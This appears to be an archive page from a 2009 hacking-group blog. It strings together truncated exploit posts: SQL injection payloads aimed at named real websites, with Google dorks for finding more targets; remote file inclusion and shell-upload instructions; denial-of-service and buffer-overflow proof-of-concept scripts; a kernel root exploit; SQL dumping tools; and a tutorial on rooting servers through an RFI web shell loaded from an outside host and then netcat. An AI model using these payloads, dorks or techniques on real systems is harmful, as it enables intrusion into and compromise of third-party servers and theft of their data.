Wednesday, December 23, 2009

merry christmas 2009 and happy new year 2010

Praying the blessings of the season will refresh you this Christmas and throughout the coming y...

Monday, December 14, 2009

Eurologon CMS SQL Injection Vuln

Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
links.php
[o] Exploit
http://localhost/[path]/links.php?id=[SQL]
[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*
[o] Dork
"Powered by Eurologon"
[o] Notes
this is a private scri...

Saturday, November 28, 2009

Joomla Component com_lyftenbloggie Remote SQL injection vulnerability

#############################################################################################
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ##
## Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
#############################################################################################
[ Software Information ]
[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+]...

Friday, November 27, 2009

Flashden Shell Upload Vulnerability

# Exploit Title: Flashden Shell Upload Vulnerability
# Date: 26.12.2009
# Author: DigitALL
# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members
# Vendor: http://www.jurgenvisser.nl
# Version: 2.0
# Dork: inurl:"select_file2.php"
# Application: Please Add Files ( Your Shell ) And Upload.
# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back d...

Wednesday, November 25, 2009

Eid al-Adha 1428H

Happy Eid al-Adha 1428...

Thursday, October 15, 2009

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

<?php
/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file(spider.sav) will result in a local crash
of Spider Solitaire
*/
$username="pwn"; //Replace with your computer username
$file="spider.sav";
$junk="Spider Solitaire Local Crash";
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle,$junk);
fclose($handle);
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";
if(!copy($file,$file2))
{
 die("Can't copy file");
}
else
{
 echo "File succesfully...

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python
# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09
import sys
import socket
import os
def main(argc , argv):
    if len(sys.argv) != 2:
        os.system("cls")
        sys.exit("Usage: " + sys.argv[0] + " \n")
    target_host = sys.argv[1]
    target_port = 5060
...

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 06.08.2009
Risk: High
Affected Software:
- - PHP 5.3.0
- - PHP 5.2.10
Original URL:
http://securityreason.com/achievement_securityalert/65
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically...

playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]
Download:http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]
file: /lib/function.php
// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php";...

Sunday, October 4, 2009

jasakom has been hacked

...

Redcat Media SQL Injection Vulnerability

[x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]
| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 October 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc
[x]==========================================[x]
| Dork : “Powered...

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion Vulnerability
Software : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");
include/functions.php
[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0...

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');
admin/includes/createemails.php
[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0...

Monday, September 28, 2009

Simple SQLi Dumper (SSDp) v0.1 GUI

taken from c0li.m0de.0n
<?
#!/usr/bin/perl
# Simple SQLi Dumper (SSDp) v2.2
# Coded by Vrs-hCk
# ander[at]antisecurity.org
# Anti Security Team
# Example: http://localhost/index.php?id=-1+union+select+1,2,3,c0li,5
use HTTP::Request;
use LWP::UserAgent;
my $c0de = "0x63306C69";
my $logo = "SSDp";
print "\n *************************************\n";
print " * ...

Sunday, September 27, 2009

Metasploit Framework

Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only.
Metasploit is a community project managed by Metasploit LLC.
Metasploit 3.3 for WIN.32
Metasploit 3.3 for U...

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

#!/usr/bin/env python
#########################################################################
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.clos...

Friday, September 25, 2009

Mambo/Joomla SQL Injection Vulnerability

#######################################################
## Mambo/Joomla SQL Injection Vulnerability ##
## Component : com_tupinambis ##
## Release : September 23, 2009 ##
#######################################################
[+] Author : Don Tukulesto
[+] Homepage : http://www.indonesiancoder.com
[+]...

Joomla Component com_fastball (league) Remote SQL Injection Vulnerability

#############################################################################################################
## Joomla Component com_fastball Remote SQL injection vulnerability -(league) ##
## Author : kaMtiEz (kamzcrew[at]gmail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 23, 2009 ##
#############################################################################################################
### Hello My Name Is :
...

Wednesday, September 23, 2009

How to hide your IP

I know many of you are hiding IPs via Socks or proxy.. that's shit... sorry, but if they have Java they can get your IP even if you are connected through a socks. So, if you have a good internet connection you can use this software:
1. Local ip > AOL (using AOL 9.1 or AOL Desktop 10.)
To configure your IP to use the AOL USA IP class you have to go to:
Open AOL 9.1 > Connection options > Advanced Broadband Settings > continue > & at Broadband you will see something " You are currently editing settings for Broadband, then click and go down to...

Saturday, September 19, 2009

Happy Eid-Ul Fitr 1430

Words by words here might hurt you once even more. In case, We need to apologize to you on it.
Translation (lol) : SAYA MATTHEWS MENGUCAPKAN SELAMAT HARI RAYA IDUL FITRI 1430 H MOHON MAAF LAHIR BA...

IMS SiteManager Blind SQL Injection Vuln

[o]------------------------------------------------------------------------------------[x]
| Blind SQL Injection Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : IMS SiteManager |
| Vendor : www.sitemanager.ims.net |
| Date : 13 sept 2009 |
| Author : zxvf |
| Contact : paddy[at]antisecurity[dot]org |
[o]------------------------------------------------------------------------------------[o]
[?] Google Dork "Powered by IMS SiteManager"
[?] Exploit ...

ExpressLink™ SEO Blind SQL Injection Vuln

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Details *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
type :: ( menu_list.php?cid=...

Thursday, September 17, 2009

BSR Webweaver Version 1.33 /Scripts access restriction bypass

[*] Date: 15/09/09
[*] http://www.brswebweaver.com/downloads.html
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description : The ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts]. The access security check is that if the attacker tries to access /scripts a 404 Error response occurs! Now to bypass and check the directory listing [that is, if Directory Browsing is allowed in the server configuration!] just copy and paste the exploit url! This is the reason this exploit is not called a Directory...

How to Use John the Ripper

In this config we are going to use John the Ripper’s password cracker to enhance the security of your server by choosing a proper password for your system. This config assumes that you have already installed John the Ripper’s password cracker. If you haven’t installed it then please go to install Password cracker - John the Ripper now.
Create test user
For testing purposes you should create a testing user “johnripper” with password “password”.
adduser johnripper
Crack password
John the Ripper’s password cracker needs to access...

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

/* second verse, same as the first CVE-2009-2698 udp_sendmsg(), x86/x64 Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at NULL and finding it executed This exploit is a bit more nuanced and thoughtful ;) use ./therebel.sh for everything At this moment, when each of us must fit an arrow to his bow and enter the lists anew, to reconquer, within history and in spite of it, that which he owns already, the thin yield of his fields, the brief love of the earth, at this moment when at last a man is born, it is time...

Monday, September 14, 2009

IndexScript 3.0 SQL Injection Vuln

[o] IndexScript 3.0 SQL Injection Vulnerability
Software : IndexScript version 3.0
Vendor : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author : NoGe
Home : http://antisecurity.org
[o] Vulnerable file
more.php
[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]
[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--
[o] Dork
"powered by...

Saturday, September 12, 2009

Source code sqltools.php

code sql tools
<?
set_time_limit(0);
error_reporting(0);
$fungsi=strip_tags($_POST['fungsi']);
$url=strip_tags($_POST['url']);
$db=strip_tags($_POST['db']);
$table=strip_tags($_POST['table']);
$column=strip_tags($_POST['column']);
$start=strip_tags($_POST['start']);
$stop=strip_tags($_POST['stop']);
$target=strip_tags($_POST['target']);
?>
<title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
<head> </head>
<script>
function show(id){ document.getElementById(id).style.display="block"; }
function hide(id){...

Local Root via NetCat

taken from BABY CORP
You will need:
Quote:
- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)
The aim of this tutorial is to give a very general picture of the process of rooting a Linux server with Safe Mode: OFF.
Suppose that we have found a site with RFI vulnerability:
Code:
http://www.hackedsite.com/folder/index.html?page=
We can run shell exploiting Remote File Inclusion, as follows:
Code:
http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?
where...

Agoko CMS <= 0.4 remote commands execution exploit

#!/usr/bin/perl
print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------
[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko
~;
#>-----------<#
#>- Working -<#
#>-----------<#
#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# --------------------------------------------------...

Finding vulnerabilities in PHP scripts FULL ( with examples )

Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08[at]gmail[dot]com
Contents :
1) About
2) Some stuff
3) Remote File Inclusion
3.0 - Basic example
3.1 - Simple example
3.2 - How to fix
4) Local File Inclusion
4.0 - Basic example
4.1 - Simple example
4.2 - How to fix
5) Local File Disclosure/Download
5.0 - Basic example
5.1 - Simple example
5.2 - How to fix
6) SQL Injection
6.0 - Basic example
6.1 - Simple example
6.2 - SQL Login Bypass
6.3 - How to fix
7) Insecure...
